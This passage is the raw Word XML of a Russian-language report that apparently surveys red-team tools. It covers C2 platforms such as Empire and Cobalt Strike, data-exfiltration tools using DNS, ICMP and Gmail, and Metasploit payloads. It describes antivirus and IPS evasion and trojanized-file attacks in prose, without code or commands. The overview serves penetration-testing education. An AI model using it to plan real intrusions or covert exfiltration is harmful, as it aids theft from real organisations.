        <w:t xml:space="preserve"> – инструмент восстановления паролей. Он извлекает множество сохраненных имен пользователей и паролей из ра</w:t>
      </w:r>
      <w:r w:rsidRPr="00840AF7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>зных приложений, что может помочь в продвижении;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F31068" w14:textId="77777777" w:rsidR="00840AF7" w:rsidRDefault="00EE7791" w:rsidP="00840AF7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48FA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Командование и управление (С2):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8320F5" w14:textId="77777777" w:rsidR="00840AF7" w:rsidRDefault="00EE7791" w:rsidP="00840AF7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0AF7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Empire – платформа </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00840AF7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>PowerShell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00840AF7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, используемая после атаки. Позволяет запускать агенты </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00840AF7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>PowerShell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00840AF7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> без необходимости использования powershell.exe, что позволяет обходить некоторые</w:t>
      </w:r>
      <w:r w:rsidRPr="00840AF7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> решения безопасности, основанные на детектировании данного процесса;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD3CCCF" w14:textId="3548CB9F" w:rsidR="002A3235" w:rsidRPr="00840AF7" w:rsidRDefault="00EE7791" w:rsidP="00840AF7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40AF7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Cobalt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00840AF7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Strike – многофункциональное программное обеспечение, которое также позволяет устанавливать связь с удаленными машинами и передавать команды посредством маяков</w:t>
      </w:r>
      <w:r w:rsidR="00FB663C" w:rsidRPr="00FB663C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> [2]</w:t>
      </w:r>
      <w:r w:rsidRPr="00840AF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EA9C82" w14:textId="77777777" w:rsidR="00840AF7" w:rsidRDefault="00EE7791" w:rsidP="00840AF7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48FA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Извлечение данных:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FEC8D26" w14:textId="77777777" w:rsidR="00840AF7" w:rsidRDefault="00EE7791" w:rsidP="00840AF7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40AF7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Cloakify</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00840AF7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Factory – позволяет скрывать данные на простом сайте без запуска каких-либо сетевых предупреждений, путем перевода всей информации в строки;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248D6139" w14:textId="77777777" w:rsidR="00840AF7" w:rsidRDefault="00EE7791" w:rsidP="00840AF7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0AF7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Data </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00840AF7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Exfiltration</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00840A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40AF7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Toolkit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00840AF7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – инструмент вывода данных с помощью ICMP, социальных сетей и даже GMAIL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF66DC7" w14:textId="02B994C8" w:rsidR="002A3235" w:rsidRPr="00840AF7" w:rsidRDefault="00EE7791" w:rsidP="00840AF7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40AF7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>DNSEx</w:t>
      </w:r>
      <w:r w:rsidRPr="00840AF7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>filtration</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00840AF7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – инструмент, кодирующий данные, чтобы они соответствовали DNS-запросам, а затем передает их по скрытому каналу DNS-запроса.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EDE65CD" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="00EE7791" w:rsidP="009F031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спользование конкретного инструментария в частном случае может быть обусловлено спецификой того или иного приложения ил</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и сервиса и, как уже было оговорено ранее, слабо отличается от обычного тестирования на проникновение. При проведении RT операций встает вопрос командного взаимодействия и систематизации полученных результатов — речь идет об отчетах различных инструменталь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ных средств анализа, перечне уязвимостей, выявленных в ручном режиме — существует огромный объем информации, в котором без должного порядка и системного подхода можно упустить что-то важное, рискуя запутаться в возможной дублирующийся информации. Также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сущ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ествует необходимость сведения отчетов и их нормализация и приведение к единому виду.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F442B6" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="002A3235" w:rsidP="009F031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B026C4" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="00EE7791" w:rsidP="009F031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1.1.1 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Metasploit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 Framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25CC2790" w14:textId="4BB29403" w:rsidR="002A3235" w:rsidRDefault="00EE7791" w:rsidP="009F031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Metasploit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наиболее часто используемый фреймворк – он обладает наибольшим числом существующих модулей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т.е.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может покрыть большинство запросов на стороннее ПО своими силами. Возможна работа с локальной базой данных, которая может содержать информацию по с</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>канированию, обнаруженные учетные записи и подобное, что упрощает взаимодействие фреймворка с инструментами активной или пассивной разведки и ведет к повышению эффективности работы программы</w:t>
      </w:r>
      <w:r w:rsidR="00FB663C" w:rsidRPr="00FB663C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> [1]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E25368C" w14:textId="77777777" w:rsidR="000F3D15" w:rsidRDefault="00EE7791" w:rsidP="000F3D1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фреймворк с оболочкой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Armitage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новым графическим интер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фейсом, созданным с прицелом на подражание хакерским атакам - может также быть и сервером С2 (Command and Control). Интерактивная оболочка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Meterpreter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расширенная многофункциональная начинка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Payload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которая может быть динамически расширена во время вы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полнения - используется в качестве полезной нагрузки, позволяет атакующему исследовать целевую машину, выполнять команды ОС, а также встраивать полезную нагрузку в легитимные процессы. Для генерации полезной нагрузки служит инструмент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msfvenom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В настоящее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время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Metasploit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имеет 592 полезных нагрузки. Некоторые из них:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E9724D" w14:textId="77777777" w:rsidR="000F3D15" w:rsidRPr="000F3D15" w:rsidRDefault="00EE7791" w:rsidP="002948FA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48FA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Командная оболочка – позволяет пользователям запускать сценарии сбора или запускать произвольные команды на хосте.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E6794D" w14:textId="77777777" w:rsidR="000F3D15" w:rsidRPr="000F3D15" w:rsidRDefault="00EE7791" w:rsidP="002948FA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948FA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002948FA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (интерпретатор </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002948FA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002948FA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>) позволяет пользователям управлять экр</w:t>
      </w:r>
      <w:r w:rsidRPr="002948FA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>аном устройства с помощью VNC, а также просматривать, выгружать и скачивать файлы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4F66D1" w14:textId="77777777" w:rsidR="000F3D15" w:rsidRPr="000F3D15" w:rsidRDefault="00EE7791" w:rsidP="002948FA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48FA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Динамические полезные нагрузки – позволяют пользователям обходить антивирусную защиту, создавая уникальные полезные нагрузки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0241FB96" w14:textId="51B4C0A5" w:rsidR="002A3235" w:rsidRPr="000F3D15" w:rsidRDefault="00EE7791" w:rsidP="002948FA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48FA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Статические полезные данные – обеспечивают пере</w:t>
      </w:r>
      <w:r w:rsidRPr="002948FA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>адресацию статического IP-адреса или порта для связи между хостом и клиентской системой.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1141D289" w14:textId="77777777" w:rsidR="009F031A" w:rsidRDefault="00EE7791" w:rsidP="009F031A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анный фреймворк полезен не только в эксплуатации уязвимостей, но и в пост эксплуатации – имеется, как уже было заявлено ранее, возможность обхода </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>средств антивирусной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защиты и систем предотвращения вторжений (IPS).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Важным аспектом является возможность написания собственного модуля на одном из трех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языков программирования – Go, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Python и Ruby.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385D6B5B" w14:textId="50240788" w:rsidR="002A3235" w:rsidRDefault="00EE7791" w:rsidP="009F031A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фреймворк поставляется как проект с открытым исходным кодом, что и обус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лавливает его популярность. В некоторые ОС он предустановлен (прим.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Kali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Linux).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72EC4EEF" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="002A32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9D259A" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="00EE7791" w:rsidP="009F031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1.1.2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Cobalt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Strike</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508E7136" w14:textId="77777777" w:rsidR="009F031A" w:rsidRDefault="00EE7791" w:rsidP="009F031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Cobalt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Strike – коммерческий продукт, продвигаемый как инструмент моделирования действий злоумышленников. Позволяет проводить командам безопасности оценку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уязвимости корпоративной инфраструктуры, а также может быть использован в качестве инструмента тестирования на проникновение.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576301DD" w14:textId="1A913AEE" w:rsidR="009F031A" w:rsidRDefault="00EE7791" w:rsidP="009F031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Главное отличие данного продукта от какой-либо другой программы или инструмента заключается в размещении атакуемой сети небольшой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программы, именуемой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Beacon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которая является каналом связи с управляющим сервером.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A89866D" w14:textId="77777777" w:rsidR="009F031A" w:rsidRDefault="00EE7791" w:rsidP="009F031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Кроме того, данная программа может выполнять сценарии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PowerShell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выполнять действия по ведению журнала ключей, делать снимки экрана, загружать файлы и порождать другие п</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>олезные нагрузки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD1D026" w14:textId="77777777" w:rsidR="000F3D15" w:rsidRDefault="00EE7791" w:rsidP="000F3D1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Cobalt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Strike работает, рассылая </w:t>
      </w:r>
      <w:r w:rsidR="009F031A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Beacon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обнаружения сетевых уязвимостей. При использовании по назначению он имитирует реальную атаку. Используя данный инструмент, специалисты по безопасности могут легко выявлять и устранять уязвимости </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и оценивать их на основе серьезности проблем, которые они потенциально могут вызвать. Данное программное обеспечение позволяет полностью решить следующие вопросы:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06AC17AF" w14:textId="77777777" w:rsidR="000F3D15" w:rsidRPr="000F3D15" w:rsidRDefault="00EE7791" w:rsidP="002948FA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48F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Обнаружение устаревшего программного обеспечения - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002948FA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Cobalt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002948FA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Strike можно использовать, чтобы узнать, использует ли компания или бизнес устаревшие версии программного обеспечения и требуется ли какое-либо исправление.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110D3E7A" w14:textId="77777777" w:rsidR="000F3D15" w:rsidRPr="000F3D15" w:rsidRDefault="00EE7791" w:rsidP="002948FA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48FA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Мониторинг кибербезопасности - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002948FA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Cobalt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002948FA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Str</w:t>
      </w:r>
      <w:r w:rsidRPr="002948FA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ike может помочь контролировать кибербезопасность компании на регулярной основе, используя платформу, которая атакует корпоративную сеть, применяя несколько векторов атак (пример. электронная почта, просмотр веб-страниц, уязвимости веб-приложений, атаки с </w:t>
      </w:r>
      <w:r w:rsidRPr="002948FA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>применением социальной инженерии) для обнаружения слабых мест, которые могут быть использованы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012422CE" w14:textId="77777777" w:rsidR="000F3D15" w:rsidRPr="000F3D15" w:rsidRDefault="00EE7791" w:rsidP="002948FA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48FA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Определение слабых паролей домена - большинство нарушений безопасности сегодня связаны со слабыми и украденными паролями. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002948FA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Cobalt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002948FA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Strike позволяет идентифицировать пользователей со слабыми доменными паролями.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4B7E80" w14:textId="77777777" w:rsidR="000F3D15" w:rsidRPr="000F3D15" w:rsidRDefault="00EE7791" w:rsidP="002948FA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48FA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Анализ общего состояния безопасности - инструмен</w:t>
      </w:r>
      <w:r w:rsidRPr="002948FA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>т дает общую картину состояния безопасности компании, в том числе о том, какие данные могут быть особенно уязвимыми, поэтому исследователи безопасности могут расставить приоритеты в отношении рисков, требующих немедленного внимания.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6CE9D3" w14:textId="68891DDC" w:rsidR="002A3235" w:rsidRPr="000F3D15" w:rsidRDefault="00EE7791" w:rsidP="002948FA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48FA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Подтверждение эффективн</w:t>
      </w:r>
      <w:r w:rsidRPr="002948FA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ости систем безопасности конечных точек - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002948FA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Cobalt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002948FA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Strike также может обеспечить тестирование элементов управления, таких как средства защиты электронной почты, брандмауэры, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002948FA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Endpoint</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002948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48FA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Detection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002948FA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Response и антивирусное программное обеспечение.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23530AFC" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="00EE7791" w:rsidP="000F3D1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ля обнаружения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устранения уязвимостей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Cobalt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Strike предлагает следующие специальные функции:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D93C64" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="00EE7791" w:rsidP="000F3D1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Атака с использованием различных файлов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Cobalt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Strike предлагает различные подходы для проведения атаки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drive-by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для преобразования невинного файла в троянского коня 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симуляции атаки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797BA9FF" w14:textId="77777777" w:rsidR="000F3D15" w:rsidRDefault="00EE7791" w:rsidP="000F3D1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Вот варианты данной атаки, предлагаемые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Cobalt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Strike:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D757CC8" w14:textId="77777777" w:rsidR="000F3D15" w:rsidRPr="000F3D15" w:rsidRDefault="00EE7791" w:rsidP="002948FA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48FA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Атаки апплетов Java</w:t>
      </w:r>
    </w:p>
